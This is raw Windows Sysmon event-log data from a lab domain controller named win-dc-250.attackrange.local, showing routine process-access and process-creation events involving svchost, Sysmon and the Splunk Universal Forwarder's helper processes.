13:36:17.503{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:17.503{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:17.503{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:17.503{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:17.503{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-48D1-6000-6505-000000009A01}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:17.503{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-48D1-6000-6505-000000009A01}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:17.504{08A6967A-48D1-6000-6505-000000009A01}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.972{08A6967A-48D2-6000-6705-000000009A01}68446848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.815{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-48D2-6000-6705-000000009A01}6844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.815{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.815{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.815{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.815{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.815{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-48D2-6000-6705-000000009A01}6844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.815{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-48D2-6000-6705-000000009A01}6844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.816{08A6967A-48D2-6000-6705-000000009A01}6844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.331{08A6967A-48D2-6000-6605-000000009A01}68127116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.175{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-48D2-6000-6605-000000009A01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.175{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.175{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.175{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.175{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.175{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-48D2-6000-6605-000000009A01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.175{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-48D2-6000-6605-000000009A01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:18.175{08A6967A-48D2-6000-6605-000000009A01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:19.956{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-48D3-6000-6805-000000009A01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:19.956{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:19.956{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 